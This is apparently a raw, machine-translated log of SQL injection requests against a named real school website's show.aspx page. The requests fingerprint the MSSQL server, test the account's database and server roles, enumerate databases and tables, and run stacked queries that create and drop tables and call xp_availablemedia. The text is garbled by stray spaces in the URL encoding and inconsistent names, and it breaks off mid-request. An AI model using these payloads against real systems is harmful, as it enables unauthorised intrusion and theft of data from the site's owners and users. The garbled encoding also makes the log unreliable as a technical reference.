Including the database name, table name, field name, field content (Table content), number of tables, and test-related permissions.
(Mssql/mysql)
========================================
GET aspx? Xt = student_manager_reward & id = 73 "> http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 20 user = 0 --
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 20 user = 0 --
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 20db_name () % 3E0 -- % 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 20db_name () % 3E0 -- % 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 20 @ version % 3E1 -- % 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 20 @ servername % 3E0 -- % 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 20 user % 3E0 -- % 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 20 cast (is_member (0x640062005f006f0077006e0065007200) % 20as % 20 nvarchar (1) % 2 bchar
(124) = 1% 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 20 cast (is_srvrolemember (0x73006500740075007000610064006d0069006e00) % 20as %
20 nvarchar (1) % 2 bchar (124) = 1% 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 20 cast (is_srvrolemember (0x73006500630075007200690074007900610064006d0069006e00) %
20as % 20 nvarchar (1) % 2 bchar (124) = 1% 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 20 cast (is_srvrolemember (0x620075006c006b00610064006d0069006e00) % 20as % 20 nvarchar
(1) % 2 bchar (124) = 1% 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 200% 3C (select % 20top % 201% 20 cast ([name] % 20as % 20 nvarchar (4000) % 2 bchar (94) % 20 from
(Select % 20top % 20% 201% 20 dbid, name % 20 from % 20 [master]. [dbo]. [sysdatabases] % 20 order % 20by % 20 [dbid]) % 20 t % 20 order % 20by % 20 [dbid] % 20 desc) -- % 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 200% 3C (select % 20top % 201% 20 cast ([name] % 20as % 20 nvarchar (4000) % 2 bchar (94) % 20 from
(Select % 20top % 20% 202% 20 dbid, name % 20 from % 20 [master]. [dbo]. [sysdatabases] % 20 order % 20by % 20 [dbid]) % 20 t % 20 order % 20by % 20 [dbid] % 20 desc) -- % 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 200% 3C (select % 20top % 201% 20 cast ([name] % 20as % 20 nvarchar (4000) % 2 bchar (94) % 20 from
(Select % 20top % 20% 203% 20 dbid, name % 20 from % 20 [master]. [dbo]. [sysdatabases] % 20 order % 20by % 20 [dbid]) % 20 t % 20 order % 20by % 20 [dbid] % 20 desc) -- % 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20; drop % 20 table % 20 foofoofoo; -- % 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20; insert % 20 foofoofoo % 20 exec % 20master. dbo. xp_availablemedia; -- % 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20; drop % 20 table % 20 foofoofoo; -- % 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20; create % 20 table % 20 foofoofoo (name % 20 nvarchar (255), description % 20 nvarchar (4000); -- %
20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 200% 3C (select % 20top % 201% 20 cast ([name] % 20as % 20 nvarchar (4000) % 2 bchar (94) % 2 bcast
([Description] % 20as % 20 nvarchar (4000 )) % 20 from (select % 20top % 20% 201% 20 * % 20 from % 20 foofoo % 20 order % 20by % 20 [name]) % 20 t % 20 order % 20by % 20 [name] % 20 desc) -- % 20and %
201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = maid & id = 73% 20and % 20 (select % 20 cast (count (*) % 20as % 20 varchar (10) % 2 bchar (94) % 20 from % 20 [main] ..
[Sysobjects] % 20 where % 20 xtype = char (85) % 20and % 20 status % 3E0) % 3E0 -- % 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 20 (select % 20top % 201% 20 cast (name % 20as % 20 varchar (256) % 20 from (select % 20top % 201%
20id, name % 20 from % 20 [main] .. [sysobjects] % 20 where % 20 xtype = char (85) % 20and % 20 status % 3E0% 20 order % 20by % 20id) % 20 t % 20 order % 20by % 20id % 20 desc) % 3E0 -- % 20and % 201 = 1
GET http://xgzx.whcm.com.cn/show.aspx? Xt = student_manager_reward & id = 73% 20and % 20 (select